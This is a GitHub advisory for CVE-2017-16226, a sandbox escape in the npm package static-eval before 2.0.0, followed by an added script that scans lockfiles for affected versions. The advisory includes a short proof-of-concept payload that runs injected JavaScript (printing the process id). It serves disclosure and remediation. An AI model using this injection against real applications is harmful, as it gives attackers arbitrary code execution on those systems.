Sandbox Breakout / Arbitrary Code Execution in static-eval

Moderate severity GitHub Reviewed Published Aug 6, 2018 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

static-eval (npm)

Affected versions

< 2.0.0

Patched versions

2.0.0

Description

Affected versions of static-eval pass untrusted user input directly to the global Function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id

Recommendation

Update to version 2.0.0 or later.
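
To confirm that no copy below 2.0.0 remains in a dependency tree, including nested copies pulled in by other packages, the following added example (not part of the advisory or of static-eval) scans a parsed package-lock.json for affected installs. It assumes npm's lockfile layouts: path-keyed "packages" (lockfileVersion 2/3) and nested "dependencies" (lockfileVersion 1). The sample lockfiles and the names isAffected and findAffected are constructed for illustration.

```javascript
// Added example: find static-eval installs below the patched 2.0.0 release
// in a parsed package-lock.json. Sample lockfile data below is constructed.
const PKG = 'static-eval';
const PATCHED_MAJOR = 2; // advisory: affected < 2.0.0, patched 2.0.0

// True when a version string falls in the affected range (< 2.0.0).
// Pre-releases of 2.0.0 (e.g. 2.0.0-rc.1) sort below 2.0.0, so they count.
function isAffected(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?/.exec(String(version));
  if (!m) return true; // unparseable (git URL, tag): flag for manual review
  const [major, minor, patch] = [m[1], m[2], m[3]].map(Number);
  if (major < PATCHED_MAJOR) return true;
  return major === PATCHED_MAJOR && minor === 0 && patch === 0 && Boolean(m[4]);
}

// Walk both lockfile layouts: "packages" (lockfileVersion 2/3, keyed by
// install path) and nested "dependencies" (lockfileVersion 1).
function findAffected(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path.endsWith('node_modules/' + PKG) && isAffected(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = trail + 'node_modules/' + name;
      if (name === PKG && isAffected(meta.version)) {
        hits.push({ path, version: meta.version });
      }
      walk(meta.dependencies, path + '/');
    }
  };
  if (!lock.packages) walk(lock.dependencies, ''); // v2 files carry both
  return hits;
}

// Constructed sample lockfiles (not from the advisory).
const sampleV3 = { lockfileVersion: 3, packages: {
  '': { name: 'app', version: '1.0.0' },
  'node_modules/static-eval': { version: '2.0.0' },
  'node_modules/brfs/node_modules/static-eval': { version: '1.1.1' },
} };
const sampleV1 = { lockfileVersion: 1, dependencies: {
  brfs: { version: '1.4.3', dependencies: { 'static-eval': { version: '0.2.4' } } },
} };
console.log(findAffected(sampleV3), findAffected(sampleV1));
```

For a real project, pass JSON.parse of the project's package-lock.json to findAffected; any hit is a copy that still needs to move to 2.0.0 or later.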

References

Published to the GitHub Advisory Database Aug 6, 2018
Reviewed Jun 16, 2020
Last updated Sep 11, 2023

Severity

Moderate

Weaknesses

CVE ID

CVE-2017-16226

GHSA ID

GHSA-5mjw-6jrh-hvfq

Source code

No known source code